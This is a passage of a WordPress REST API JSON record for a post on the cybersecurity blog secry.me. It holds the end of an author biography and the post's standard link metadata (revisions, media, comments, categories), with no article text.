cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=3008"}],"version-history":[{"count":39,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008\/revisions"}],"predecessor-version":[{"id":4763,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/3008\/revisions\/4763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/3036"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=3008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=3008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=3008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}